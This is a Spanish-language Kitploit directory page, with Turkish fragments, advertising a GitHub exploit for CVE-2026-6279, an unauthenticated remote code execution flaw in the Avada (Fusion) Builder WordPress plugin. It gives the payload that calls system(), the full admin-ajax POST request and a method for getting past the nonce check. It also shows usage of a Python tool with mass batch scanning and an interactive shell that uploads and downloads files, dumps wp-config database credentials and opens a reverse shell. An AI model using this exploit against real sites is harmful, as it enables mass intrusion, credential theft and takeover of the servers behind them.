Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-6279 — CVE-2026-6279: Avada (Fusion) Builder <= 3.15.2 – Ejecución remota de código no autenticada mediante inyección de funciones PHP a través del atributo de shortcode 'render_logics' a través del manejador AJAX de widget (fusion-builder) | Kitploit
Herramientas/GitHubGitHub/xxconi/cve-2026-6279
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlRed TeamingDesarrollo de Payloads
GitHubxxconi/cve-2026-6279

CVE-2026-6279

CVE-2026-6279: Avada (Fusion) Builder <= 3.15.2 – Ejecución remota de código no autenticada mediante inyección de funciones PHP a través del atributo de shortcode 'render_logics' a través del manejador AJAX de widget (fusion-builder)

Ver Repositorio
17hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
╔══════════════════════════════════════════════════════════════╗ ║ CVE-2026-6279 · Avada Builder <= 3.15.2 ║ ║ Unauthenticated RCE via call_user_func() ║║ ╚══════════════════════════════════════════════════════════════╝ ```

CVE CVSS Auth Plugin Installs Python


📋 Resumen

CampoDetalle
CVE IDCVE-2026-6279
AfectadoAvada Builder (Fusion Builder) <= 3.15.2
TemaWordPress Avada Theme
Instalaciones activas900.000+
Tipo de vulnerabilidadInyección de funciones PHP → RCE sin autenticación
CVSS v3.19.8 (Crítico)
VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Autenticación❌ No requerida
Interacción del usuario❌ No requerida
Investigadorxxcoin
Fecha de publicación2026-05-24

🔗 Cadena de ataque

root@kitploit:~
┌─────────────────────────────────────────────────────────────────┐
│                                                                 │
│  1. NONCE TESPİT                                                │
│     wp_create_nonce('fusion_load_nonce') → UID 0               │
│     [fusion_post_cards] veya [fusion_table_of_contents]        │
│     shortcode'u olan herkese açık sayfalarda JS'e eklenir      │
│                          │                                      │
│                          ▼                                      │
│  2. UNAUTHENTICATED AJAX                                        │
│     wp_ajax_nopriv_fusion_get_widget_markup                     │
│     check_ajax_referer() → sadece nonce geçerliliği kontrol    │
│     eder, kullanıcı kimliği doğrulanmaz                        │
│                          │                                      │
│                          ▼                                      │
│  3. DESERİALİZASYON                                             │
│     base64_decode(render_logics) → json_decode()               │
│     Yapı doğrulaması yok — saldırgan kontrolündeki JSON        │
│                          │                                      │
│                          ▼                                      │
│  4. call_user_func() — ALLOWLIST YOK                            │
│     get_value() → wp_conditional_tags case                     │
│     call_user_func($value['function'], $value['args'])         │
│     Herhangi bir PHP fonksiyonu çağrılabilir                   │
│                          │                                      │
│                          ▼                                      │
│  5. RCE ✓                                                       │
│     system("id") → uid=1000(xxcoin)                         │
│     Web sunucusu yetkisiyle tam komut yürütme                  │
│                                                                 │
└─────────────────────────────────────────────────────────────────┘

🧬 Detalle técnico

Punto de vulnerabilidad

class-fusion-builder-conditional-render-helper.php — L1531:

root@kitploit:~
// VULNERABLE CODE
case 'wp_conditional_tags':
    $decoded = json_decode( base64_decode( $render_logics ), true );
    // ❌ Allowlist kontrolü yok
    return call_user_func( $decoded['function'], $decoded['args'] );

Estructura del payload

root@kitploit:~
{
  "type": "wp_conditional_tags",
  "value": {
    "function": "system",
    "args": "id"
  }
}

Se codifica en Base64 y se envía como campo POST render_logics.

Petición HTTP

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

action=fusion_get_widget_markup
fusion_load_nonce=<nonce>
render_logics=<base64_payload>
widget_type=WP_Widget_Recent_Posts
type=WP_Widget_Recent_Posts
widget_id=2
number=2

✅ Funciones RCE verificadas

FunciónArgumentoResultadoEstado
system()iduid=1000(xenon1337)✅ Exitoso
passthru()iduid=1000(xenon1337)✅ Exitoso
shell_exec()iduid=1000(xenon1337)✅ Exitoso
exec()iduid=1000(xenon1337)✅ Exitoso
file_get_contents()/etc/passwdroot:x:0:0:...✅ Exitoso
proc_open()——❌ Requiere 2+ argumentos
popen()——❌ Requiere 2+ argumentos

Nota: call_user_func($fn, $arg) acepta un solo argumento por naturaleza. Las funciones como proc_open, popen que requieren 2+ argumentos no pueden ser invocadas a través de esta vulnerabilidad.


🔑 ¿Por qué se puede omitir el nonce?

root@kitploit:~
1. Avada, fusion_load_nonce'u UID 0 (public kullanıcı) için üretir
2. [fusion_post_cards] veya [fusion_table_of_contents] shortcode'u
   içeren sayfalarda nonce JS çıktısına eklenir → herkes görebilir
3. check_ajax_referer('fusion_load_nonce') sadece nonce'un
   geçerliliğini doğrular — kullanıcının kimliğini doğrulamaz
4. Sonuç: Herhangi bir ziyaretçi nonce'u alıp endpoint'i çağırabilir

📁 Referencias del código fuente

ArchivoLíneaFunciónDescripción
class-fusion-builder-conditional-render-helper.phpL1083should_render()deserialización de render_logics
class-fusion-builder-conditional-render-helper.phpL1531get_value()⚠️ call_user_func() — sin allowlist
fusion-widget.phpL44—conexión de render_logics
fusion-widget.phpL389—registro del handler AJAX wp_ajax_nopriv
class-fusion-builder.phpL7551—registro de nonce determinista para UID 0

🚀 Instalación y uso

Requisitos

root@kitploit:~
pip install requests packaging

Uso

root@kitploit:~
# Menülü mod (single + batch)
python3 CVE-2026-6279.py

# Protokolsüz (otomatik tespit)
python3 CVE-2026-6279.py target.com

# Protokol ile
python3 CVE-2026-6279.py http://target.com
python3 CVE-2026-6279.py https://target.com

# Port ile
python3 CVE-2026-6279.py target.com:8080
python3 CVE-2026-6279.py http://target.com:8080

Menú

root@kitploit:~
♡ [1]  Single target  ·  interactive shell
◆ [2]  Batch scan     ·  file exploit
✗ [3]  Exit

Comandos del shell interactivo

root@kitploit:~
shell> id                          # komut çalıştır
shell> cd /var/www/html            # dizin değiştir
shell> upload local.php /tmp/x.php # dosya yükle
shell> download /etc/passwd        # dosya indir
shell> wp-config                   # DB bilgileri
shell> recon                       # sistem taraması
shell> revshell 10.0.0.1 4444      # reverse shell
shell> exit                        # çık

Escaneo por lotes

root@kitploit:~
# targets.txt formatı:
target1.com
http://target2.com
https://target3.com:8080
# yorum satırı (atlanır)
root@kitploit:~
♡ targets file [targets.txt]:
♡ threads [10]: 30
♡ command [id]:
♡ output file [vuln.txt]:

🖥️ Salida del PoC

root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║  CVE-2026-6279  ·  Avada Builder <= 3.15.2                  ║
║  Unauthenticated RCE via call_user_func()                    ║
║  Copyright © 2026 xxcoin  ·  Thanks: xxcoin 💜 ║
╚══════════════════════════════════════════════════════════════╝

★ Avada tespit edildi! (http://localhost:8888)
★ nonce: b6d7b084c2  (src: /blog/)  [shortcode✓]
★ AJAX: http://localhost:8888/wp-admin/admin-ajax.php
★ RCE: system() [B] [WP_Widget_Recent_Posts]
  • uid=1000(xxcoin) gid=1000(xxcoin) groups=1000

shell> uname -a
  • Linux debian 6.1.0-21-amd64 #1 SMP x86_64 GNU/Linux
shell> wp-config
  • DB_NAME=wordpress
  • DB_USER=wp_user
  • DB_PASSWORD=s3cr3t_p4ss!
  • DB_HOST=localhost

📊 CVSS v3.1

MétricaValor
Vector de ataqueRed
Complejidad de ataqueBaja
Privilegios requeridosNinguno
Interacción del usuarioNinguna
AlcanceSin cambios
ConfidencialidadAlta
IntegridadAlta
DisponibilidadAlta
Puntuación total9.8 — CRÍTICO
root@kitploit:~
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

⚠️ Aviso legal

Esta herramienta es solo para pruebas de seguridad autorizadas y fines educativos. El acceso no autorizado a sistemas es ilegal. Toda la responsabilidad es del usuario.


telegram. https://t.me/+-GYq8ydL9AYwZGI8)

CVE-2026-6279 · Avada Builder <= 3.15.2 ·xxcoin · 2026

Agradecimientos especiales: Shadow Girlfriend 💜

Descargar herramienta